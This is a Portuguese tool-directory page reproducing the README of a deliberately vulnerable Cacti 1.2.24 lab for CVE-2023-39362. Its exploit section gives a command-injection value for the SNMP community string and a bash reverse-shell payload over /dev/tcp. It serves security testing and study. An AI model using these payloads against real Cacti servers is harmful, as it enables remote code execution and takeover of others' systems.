Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cacti-rce-snmp-options-vulnerable-application — AVISO: Esta é uma aplicação vulnerável para testar o exploit da injeção de comando no Cacti (CVE-2023-39362). Execute por sua conta e risco! | Kitploit
Ferramentas/GitHubGitHub/m3ssap0/cacti-rce-snmp-options-vulnerable-application
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleAprendizado e EducaçãoLabs e Prática
GitHubm3ssap0/cacti-rce-snmp-options-vulnerable-application

cacti-rce-snmp-options-vulnerable-application

AVISO: Esta é uma aplicação vulnerável para testar o exploit da injeção de comando no Cacti (CVE-2023-39362). Execute por sua conta e risco!

Ver RepositórioSite
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Aplicação vulnerável de injeção de comando autenticado Cacti v1.2.24 (CVE-2023-39362)

Esta é uma aplicação vulnerável para testar o exploit para a vulnerabilidade Cacti (CVE-2023-39362).

AVISO!

Esta aplicação contém sérias vulnerabilidades de segurança. Execute-a por sua conta e risco! Recomenda-se o uso de um ambiente protegido e com backup (como uma VM com snapshot recente e rede somente host). Não faça upload desta aplicação para servidores voltados para a Internet, pois eles serão comprometidos.

AVISO LEGAL: Não me responsabilizo pela forma como qualquer pessoa usa esta aplicação. O único propósito desta aplicação é ser um cenário de teste para o exploit CVE-2023-39362 e não deve ser usado maliciosamente. Se o seu servidor for comprometido através da instalação desta aplicação, não é minha responsabilidade, é responsabilidade da(s) pessoa(s) que a carregou e instalou.

Informações da vulnerabilidade

CVE-IDLinkDescrição
CVE-2023-39362https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362No Cacti 1.2.24, sob certas condições, um usuário privilegiado autenticado pode usar uma string maliciosa nas opções SNMP de um Dispositivo, realizando injeção de comando e obtendo execução remota de código no servidor subjacente.

Uso

Aqui estão os passos para configurar o ambiente:

  1. Execute docker compose up -d para iniciar a composição.
  2. Você pode finalizar os passos navegando para http://127.0.0.1/cacti para iniciar o assistente de inicialização do Cacti. Se você receber um erro referente ao banco de dados, aguarde um pouco e atualize a página.
  3. As credenciais padrão são admin/admin.
  4. Pressione "Próximo" em todos os botões durante o assistente, escolhendo as opções adequadamente. Todos os padrões devem estar corretos e todos os pré-requisitos obrigatórios devem ser atendidos.
  5. Após a instalação, faça login como admin.
  6. Vá para "Console" > "Configuration" > "User".
  7. Clique no usuário guest.
  8. Habilite-o ("Enable"), defina uma senha, desabilite "Must Change Password at Next Login" se quiser.
  9. Clique no botão "Save".
  10. Vá para a seção "Permissions".
  11. Em "General Administration", habilite "Console Access" e "Sites/Devices/Data".
  12. Clique no botão "Save".
  13. Faça logout e re-login como guest para testar o exploit.

O container será chamado vuln-cacti.

O hostname para um dispositivo SNMP de teste é monitored_snmp_device.

Para destruir o ambiente, use o comando docker compose down.

O guia oficial de instalação do Cacti pode ser encontrado aqui.

Causa raiz

Uma descrição detalhada da causa raiz da vulnerabilidade está disponível no aviso de segurança original ou no meu post no blog.

Exploit

(Este é apenas um exploit possível)

  1. Vá para "Console" > "Create" > "New Device".
  2. Crie um Dispositivo que suporte SNMP versão 1 ou 2.
  3. Certifique-se de que o Dispositivo tenha Gráficos com um ou mais modelos de:
    • "Net-SNMP - Combined SCSI Disk Bytes"
    • "Net-SNMP - Combined SCSI Disk I/O"
    • (Criar o Dispositivo a partir do modelo "Net-SNMP Device" satisfará o pré-requisito dos Gráficos)
  4. Nas "SNMP Options", para o campo "SNMP Community String", use um valor como este: public\' ; touch /tmp/m3ssap0 ; \'.
  5. Clique no botão "Create".
  6. Verifique em /tmp a presença do arquivo criado.

Para obter um reverse shell, um payload como o seguinte pode ser usado.

root@kitploit:~
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

Autores

  • Antonio Francesco Sardella - relator da vulnerabilidade - m3ssap0

Licença

Este projeto está licenciado sob a Unlicense - veja o arquivo LICENSE para mais detalhes.

Baixar ferramenta